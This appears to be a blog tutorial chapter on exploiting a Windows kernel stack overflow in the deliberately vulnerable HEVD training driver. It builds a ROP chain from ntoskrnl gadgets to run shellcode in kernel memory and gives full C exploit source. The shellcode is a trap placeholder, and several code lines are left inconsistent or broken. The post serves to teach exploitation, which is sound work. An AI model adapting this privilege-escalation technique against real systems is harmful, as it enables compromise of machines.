<!DOCTYPE html>
<html lang="en-us">

<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">
	<meta name="theme-color" content="#ffffff">
	<meta name="msapplication-TileColor" content="#ffffff">
<meta itemprop="name" content="[Cracking Windows Kernel with HEVD] Chapter 3: Can we rop our way into triggering our shellcode?">
<meta itemprop="description" content="A beginers guide into a Windows kernel stack overflow vulnerability.">
<meta itemprop="datePublished" content="2022-11-30T13:08:50-03:00" />
<meta itemprop="dateModified" content="2022-11-30T13:08:50-03:00" />
<meta itemprop="wordCount" content="1669">



<meta itemprop="keywords" content="windows,kernel,exploit,stack,overflow,hevd,HEVD,hacksys,extreme,vulnerable,driver,exploitation,smep,kpti,bypass," /><meta property="og:title" content="[Cracking Windows Kernel with HEVD] Chapter 3: Can we rop our way into triggering our shellcode?" />
<meta property="og:description" content="A beginers guide into a Windows kernel stack overflow vulnerability." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://mdanilor.github.io/posts/hevd-3/" />
<meta property="article:published_time" content="2022-11-30T13:08:50-03:00" />
<meta property="article:modified_time" content="2022-11-30T13:08:50-03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="[Cracking Windows Kernel with HEVD] Chapter 3: Can we rop our way into triggering our shellcode?"/>
<meta name="twitter:description" content="A beginers guide into a Windows kernel stack overflow vulnerability."/>

	<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
	<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
	<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
	<link rel="manifest" href="/site.webmanifest">
	<link rel="mask-icon" href="/safari-pinned-tab.svg" color="">
	<link rel="shortcut icon" href="/favicon.ico">

	<title>[Cracking Windows Kernel with HEVD] Chapter 3: Can we rop our way into triggering our shellcode?</title>
	<link rel="stylesheet" href="https://mdanilor.github.io/css/style.min.eac77496566fd7d5768fd650ddb0b2b181ca6a2d7c5fdd6fe6b8ba4bf47e566f.css" integrity="sha256-6sd0llZv19V2j9ZQ3bCysYHKai18X91v5ri6S/R+Vm8=" crossorigin="anonymous">
	
</head>

<body id="page">
	
	<header id="site-header" class="animated slideInUp">
		<div class="hdr-wrapper section-inner">
			<div class="hdr-left">
				<div class="site-branding">
					<a href="https://mdanilor.github.io">Cebola Security</a>
				</div>
				<nav class="site-nav hide-in-mobile">
					
				<a href="https://mdanilor.github.io/posts/">Posts</a>
				<a href="https://mdanilor.github.io/about-hugo/">About</a>

				</nav>
			</div>
			<div class="hdr-right hdr-icons">
				<span class="hdr-social hide-in-mobile"><a href="https://github.com/mdanilor" target="_blank" rel="noopener me" title="Github"><svg xmlns="http://www.w3.org/2000/svg" class="feather" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path></svg></a></span><button id="menu-btn" class="hdr-btn" title="Menu"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-menu"><line x1="3" y1="12" x2="21" y2="12"></line><line x1="3" y1="6" x2="21" y2="6"></line><line x1="3" y1="18" x2="21" y2="18"></line></svg></button>
			</div>
		</div>
	</header>
	<div id="mobile-menu" class="animated fast">
		<ul>
			<li><a href="https://mdanilor.github.io/posts/">Posts</a></li>
			<li><a href="https://mdanilor.github.io/about-hugo/">About</a></li>
		</ul>
	</div>


	<main class="site-main section-inner animated fadeIn faster">
		<article class="thin">
			<header class="post-header">
				<div class="post-meta"><span>Nov 30, 2022</span></div>
				<h1>[Cracking Windows Kernel with HEVD] Chapter 3: Can we rop our way into triggering our shellcode?</h1>
			</header>
			<div class="content">
				<h2 id="cracking-hacksys-extreme-vulnerable-driver-can-we-rop-our-way-into-triggering-our-shellcode">Cracking HackSys Extreme Vulnerable Driver: Can we rop our way into triggering our shellcode?<a href="#cracking-hacksys-extreme-vulnerable-driver-can-we-rop-our-way-into-triggering-our-shellcode" class="anchor" aria-hidden="true"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M15 7h3a5 5 0 0 1 5 5 5 5 0 0 1-5 5h-3m-6 0H6a5 5 0 0 1-5-5 5 5 0 0 1 5-5h3"></path><line x1="8" y1="12" x2="16" y2="12"></line></svg></a></h2>
<h4 id="when-are-we-building-the-payload-here">When are we building the payload here?<a href="#when-are-we-building-the-payload-here" class="anchor" aria-hidden="true"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M15 7h3a5 5 0 0 1 5 5 5 5 0 0 1-5 5h-3m-6 0H6a5 5 0 0 1-5-5 5 5 0 0 1 5-5h3"></path><line x1="8" y1="12" x2="16" y2="12"></line></svg></a></h4>
<p>Patience! Thus far we have seen the basics to correctly assemble a usable payload. Now that we have all the tools necessary, let&rsquo;s finally create our payload. May the force be with us. If you missed the previous posts, make sure to check them out.</p>
<p>Our ROP chain should look something like this:</p>
<pre><code>xor ecx, ecx; ret; -&gt; zeroes out our RCX register, which is the first parameter of AllocatePoolWithTag()
pop rdx; ret ; -&gt; pops 0x1000 (4096) to rdx register, which is the second parameter of AllocatePoolWithTag() and indicates the size of the pool
0x1000 -&gt; value of rdx
AllocatePoolWithTag() -&gt; calls the AllocatePoolWithTag function. The address of the allocated pool will then be in rax
mov rcx, rax; ret; -&gt; copies the address to rcx, which will be first parameter of memcpy
pop rdx; ret -&gt; gets the source address from stack. This will be our shellcode in userland that will escalate privileges.
&lt;address of shellcode location in userland&gt;
pop r8; ret; -&gt; gets the size from stack.
&lt;size of our shellcode to be copied&gt;
memcpy() -&gt; calls the memcpy function and copies our payload to an executable kernel space
jmp rcx; -&gt; jumps to a register which stores the address of our shellcode in kernel land
</code></pre><p>That sounds pretty complicated and will probably not work like that. We will most likely have to make a few adaptations. However, the plan is simple: allocate a writable and executable location in kernel land, copy our payload to it and then jump there. We need to find gadgets to do what we want. And for that, we shall use <a href="https://github.com/sashs/Ropper">ropper</a>. This tool will assist us in our ROP journey by helping us to find the gadgets.</p>
<p>We may copy ntoskrnl.exe to a machine in which ropper is installed and then look for gadgets!</p>
<p>Let&rsquo;s fire ropper up!</p>
<p><img src="/posts/kernel2-img/15-ropper.png" alt=""></p>
<p>And now&hellip;</p>
<p><img src="/posts/kernel2-img/17-spongebob.jpg" alt=""></p>
<p>This is what we have got:</p>
<pre><code>0x38cf53: xor ecx, ecx; mov rax, rcx; ret; -&gt; Zeroes out rcx register. Also zeroes out rax, but that is ok. Couldn't find a gadget that just turned rcx into 0.
0x416748: pop rdx; ret; -&gt; pops 0x1000 (4096), just like we planned
0x1000 -&gt; value of rdx and size of the buffer
AllocatePoolWithTag(); -&gt; function to allocate an executable pool
0xa155de: add rsp, 0x20; ret -&gt; will be explained later
0x20a263: push rax; pop rbx; ret; -&gt; Moving the address in rax to rbx for later use. 
0x5af724: push rax; pop r13; ret; -&gt; Moving the addres in rax to r13
0x2c0da6: xchg r8, r13; ret;  -&gt; Now exchanging values of r13 and r8
0x93ac7a: mov rcx, r8; mov rax, rcx; ret; -&gt; Finally moving r8 to rcx, as we wished. A single gadget in our draft (mov rcx, rax; ret) was replaced by the last three gadgets. Gadgets are hard to find! We must improvise.
0x416748: pop rdx; ret; -&gt; Popping the address of the shellcode to rdx
&lt;ADDRESS OF SHELLCODE&gt;
0x2017f1: pop r8; ret; -&gt; Popping the size of the shellcode to r8
&lt;SIZE OF SHELLCODE&gt;
memcpy(); -&gt; Address of memcpy function to copy our shellcode to the executable pool
0x408aa2: jmp rbx; -&gt; Jumping to our shellcode. Remember we saved it for later use?
</code></pre><p>What a mess!
This looks far from the payload we predicted. It&rsquo;s messy and big. This happened because it is hard to find gadgets that fit exactly to our needs. We often have to compromise and accept some collateral damage.</p>
<p>There is one more catch. Check ExAllocatePoolWithTag&rsquo;s prologue:
<img src="/posts/kernel2-img/16-allocate.png" alt=""></p>
<p>As we can see, it uses <a href="https://retroscience.net/x64-assembly.html#fast-call-procedure-shadow-space-home-space">fast call procedure with shadow space</a>, AKA home space. In this convention, the caller must resere 32 bytes on stack for the callee. For ExAllocatePoolWithTag, only 24 bytes are needed. This means that after AllocatePoolWithTag we must make sure to add 0x18 to rsp. I found an <code>add rsp, 0x20</code> that will do just fine. I place it after AllocatePoolWithTag.</p>
<p>Here is what we have so far:</p>
<pre><code>#include &lt;iostream&gt;
#include &lt;string&gt;
#include &lt;Windows.h&gt;
#include &lt;Psapi.h&gt;&lt;F10&gt;

#define DEVICE_NAME	&quot;\\\\.\\HackSysExtremeVulnerableDriver&quot;
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)


//Gadgets
unsigned long long g_add_rsp_20h_ret = 0xa155de;

unsigned long long g_pop_rdi_pop_r14_pop_rbx_ret = 0x20a518;
unsigned long long g_xor_ecx_ecx_mov_rax_rcx_ret = 0x38cf53;
unsigned long long g_pop_rdx_ret = 0x416748;
unsigned long long g_push_rax_pop_rbx_ret = 0x20a263;
unsigned long long g_push_rax_pop_r13_ret = 0x5af724;
unsigned long long g_xchg_r8_r13_ret = 0x2c0da6;
unsigned long long g_mov_rcx_r8_mov_rax_rcx_ret = 0x93ac7a;
unsigned long long g_pop_r8_ret = 0x2017f1;
unsigned long long g_jmp_rbx = 0x408aa2;
unsigned long long kernel_ExAllocatePoolWithTag;
unsigned long long kernel_memcpy;

// This will store the pid for the process which privileges will be elevated
DWORD pid;


// Gets kernel base addr
unsigned long long get_kernel_base_addr() {
	LPVOID drivers[1024];
	DWORD cbNeeded;

	EnumDeviceDrivers(drivers, sizeof(drivers), &amp;cbNeeded);

	return (unsigned long long)drivers[0];
}

// Gets handle to driver
HANDLE get_handle() {
	HANDLE h = CreateFileA(DEVICE_NAME,
		FILE_READ_ACCESS | FILE_WRITE_ACCESS,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
		NULL);

	if (h == INVALID_HANDLE_VALUE) {
		printf(&quot;Failed to get handle =(\n&quot;);
		return NULL;
	}
	return h;
}

//Helper function to add gadget or address to payload and increment the offset automatically
void add_to_payload(char *in_buffer, SIZE_T *offset, unsigned long long *data, SIZE_T size)
{
	memcpy(in_buffer + *offset, data, size);
	printf(&quot;Wrote %lx to offset %u\n&quot;, *data, *offset);
	*offset += size;
}

//Looks up a kernel symbol
PVOID get_kernel_symbol_addr(const char *symbol) {
	PVOID kernelBaseAddr;
	HMODULE userKernelHandle;
	PCHAR functionAddress;
	unsigned long long offset;

	kernelBaseAddr = (PVOID)get_kernel_base_addr();  // Loaded kernel base address
	userKernelHandle = LoadLibraryA(&quot;C:\\Windows\\System32\\ntoskrnl.exe&quot;);  // Opens kernel binary as lib

	if (userKernelHandle == INVALID_HANDLE_VALUE) {
		return NULL;
	}

	functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol);  // Locates the symbol address
	if (functionAddress == NULL) {
		return NULL;
	}

	offset = functionAddress - ((PCHAR)userKernelHandle);  // Subtracts the library base address in memory from the function addresses.
	return (PVOID)(((PCHAR)kernelBaseAddr) + offset);  // Adds the offset to the leaked kernel base address
}

// Auxiliary function to adjust the offsets for all the gadgets and used functions
void adjust_offsets()
{
	unsigned long long kernel_base_addr = get_kernel_base_addr();
	g_xor_ecx_ecx_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_rdi_pop_r14_pop_rbx_ret += kernel_base_addr;
	g_add_rsp_20h_ret += kernel_base_addr;
	g_pop_rdx_ret += kernel_base_addr;
	g_push_rax_pop_rbx_ret += kernel_base_addr;
	g_push_rax_pop_r13_ret += kernel_base_addr;
	g_xchg_r8_r13_ret += kernel_base_addr;
	g_mov_rcx_r8_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_r8_ret += kernel_base_addr;
	g_jmp_rbx += kernel_base_addr;
	
	kernel_ExAllocatePoolWithTag = (unsigned long long) get_kernel_symbol_addr(&quot;ExAllocatePoolWithTag&quot;);
	kernel_memcpy = (unsigned long long) get_kernel_symbol_addr(&quot;memcpy&quot;);
	printf(&quot;Primary token: %xu \n&quot;, (ULONGLONG)kernel_PsReferencePrimaryToken - kernel_base_addr);
	printf(&quot;PsReferencePrimaryToken base addr: %xu\n&quot;, (ULONGLONG) kernel_PsReferencePrimaryToken - (ULONGLONG) kernel_base_addr);
}

//Spawns a new cmd and returns the pid for the process
DWORD spawnCmd() {
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	char cmd[] = &quot;C:\\Windows\\System32\\cmd.exe&quot;;

	ZeroMemory(&amp;si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&amp;pi, sizeof(pi));

	// Start the child process. 
	if (!CreateProcess(NULL,	// No module name (use command line)
		cmd,					// Command line
		NULL,					// Process handle not inheritable
		NULL,					// Thread handle not inheritable
		FALSE,					// Set handle inheritance to FALSE
		CREATE_NEW_CONSOLE,     // No creation flags
		NULL,					// Use parent's environment block
		NULL,					// Use parent's starting directory 
		&amp;si,					// Pointer to STARTUPINFO structure
		&amp;pi)					// Pointer to PROCESS_INFORMATION structure
		)
	{
		printf(&quot;CreateProcess failed (%d).\n&quot;, GetLastError());
		return -1;
	}

	return pi.dwProcessId;
}


char *generate_shellcode() {
	//Generates and returns a shellcode to be executed after the ROP chain. This shellcode must do heavy lifting to elevate privileges.
	char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 64);
	memset(shellcode, 0xcc, 64);
	return shellcode;
}

void do_buffer_overflow(HANDLE h)
{
	SIZE_T in_buffer_size = 2072 + 8 * 15 + 0x20; // 2072 is the offset; there are 15 8-byte long gadgets and an add rsp, 0x20.
	//Allocates memory for buffer
	PULONG in_buffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, in_buffer_size);
	//Fills with AAAAAAA...
	memset((char *)in_buffer, 'A', in_buffer_size);
	
	SIZE_T offset = 2072;

	//Spawns cmd and adjusts the pid
	pid = spawnCmd();
	//Adjust gadgets offsets
	adjust_offsets();
	//Our shellcode to escalate privileges. To be crafted!
	char *shellcode = generate_shellcode();

	//Arbitrary size of our shellcode
	unsigned long long size_of_copy = 0x100;

	

	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_xor_ecx_ecx_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;size_of_copy, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;kernel_ExAllocatePoolWithTag, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_add_rsp_20h_ret, 8);
	offset += 0x20;

	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_push_rax_pop_rbx_ret, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_push_rax_pop_r13_ret, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_xchg_r8_r13_ret, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_mov_rcx_r8_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &amp;offset, (unsigned long long *)(&amp;shellcode), 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_pop_r8_ret, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;size_of_copy, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;kernel_memcpy, 8);
	add_to_payload((char*)in_buffer, &amp;offset, &amp;g_jmp_rbx, 8);
	

	system(&quot;pause&quot;);
	printf(&quot;Sending buffer.\n&quot;);
	//Sends buffer
	bool result = DeviceIoControl(h, STACK_OVERFLOW_IOCTL_NUMBER, in_buffer, (DWORD)in_buffer_size, NULL, 0, NULL, NULL);
	if (!result)
	{
		printf(&quot;IOCTL Failed: %X\n&quot;, GetLastError());
	}
	HeapFree(GetProcessHeap(), 0, (LPVOID)in_buffer);
}


int main(int argc, char **argv)
{
	do_buffer_overflow(get_handle());
	system(&quot;pause&quot;);
}

</code></pre><p>The exploit is getting big. Let me explain some of the functions I have created:</p>
<p><code>add_to_payload</code>: you provide the buffer to which you wish to write, the current offset, the value you wish to copy and the size. It will copy the amount of bytes provided to the buffer at the offset provided and will increment the offset in N, where N is the size provided.</p>
<p><code>generate_shellcode</code>: this function will allocate a buffer in userland, put the shellcode for EoP in it and return the address. Memcpy in our ROP chain will copy the shellcode from the address allocated in this function to a kernel RWX region. For now, it will just be filled with 0xcc instructions, triggering a trap upon execution.</p>
<p><code>spawnCmd</code>: this spawns a new cmd and returns its pid. This will be the process which privileges we will elevate.</p>
<p><code>adjust_offsets</code>: function to adjust all offsets with image base addr.</p>
<p>This exploit will trigger a stack based overflow that will execute our ROPChain in the stack. The ROPChain will allocate executable (and writable) space to allocate our shellcode and copy it to the allocated memory. Then, it will jump to this region of memory and execute our shellcode. The shellcode should contain instructions do elevate our <code>cmd</code> process&rsquo; privileges. Are you with me so far?</p>
<p>The exploit should trigger a trap on WinDBG. Let us try:</p>
<p><img src="/posts/kernel2-img/18-shellcodetriggered.png" alt=""></p>
<p>I DO NOT BELIEVE THIS WORKED! The debugger has caught our trap. Now &ldquo;all&rdquo; we have to do is craft a shellcode that will elevate privileges and return gracefully (or with as much grace as possible) to userland. But this will be a topic for the next post! See you then!</p>

			</div>
			<hr class="post-end">
			<footer class="post-info">
				<p>
					<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-tag meta-icon"><path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7" y2="7"></line></svg><span class="tag"><a href="https://mdanilor.github.io/tags/windows">windows</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/kernel">kernel</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/exploit">exploit</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/stack">stack</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/overflow">overflow</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/hevd">hevd</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/hevd">HEVD</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/hacksys">hacksys</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/extreme">extreme</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/vulnerable">vulnerable</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/driver">driver</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/exploitation">exploitation</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/smep">smep</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/kpti">kpti</a></span><span class="tag"><a href="https://mdanilor.github.io/tags/bypass">bypass</a></span>
				</p>
				<p><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-file-text"><path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline><line x1="16" y1="13" x2="8" y2="13"></line><line x1="16" y1="17" x2="8" y2="17"></line><polyline points="10 9 9 9 8 9"></polyline></svg>1669 Words</p>
				<p><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-calendar"><rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line></svg>2022-11-30 13:08 -0300</p>
			</footer>
		</article>
		<div class="post-nav thin">
			<a class="prev-post" href="https://mdanilor.github.io/posts/hevd-2/">
				<span class="post-nav-label">Older&nbsp;<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-arrow-right"><line x1="5" y1="12" x2="19" y2="12"></line><polyline points="12 5 19 12 12 19"></polyline></svg></span><br><span>[Cracking Windows Kernel with HEVD] Chapter 2: Is there a way to bypass kASLR, SMEP and KVA Shadow?</span>
			</a>
		</div>
		<div id="comments" class="thin">
</div>
	</main>

	<footer id="site-footer" class="section-inner thin animated fadeIn faster">
		<p>&copy; 2022 <a href="https://mdanilor.github.io">Danilo &#34;mdanilor&#34; Rodrigues</a> &#183; <a href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC BY-NC 4.0</a></p>
		<p>
			Made with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> &#183; Theme <a href="https://github.com/Track3/hermit" target="_blank" rel="noopener">Hermit</a> &#183; <a href="https://mdanilor.github.io/posts/index.xml" target="_blank" title="rss"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-rss"><path d="M4 11a9 9 0 0 1 9 9"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle></svg></a>
		</p>
	</footer>



	<script src="https://mdanilor.github.io/js/bundle.min.4a9a0ac3d2217822c7865b4161e6c2a71de1d70492264337755427898dd718f6.js" integrity="sha256-SpoKw9IheCLHhltBYebCpx3h1wSSJkM3dVQniY3XGPY=" crossorigin="anonymous"></script>
	

</body>

</html>
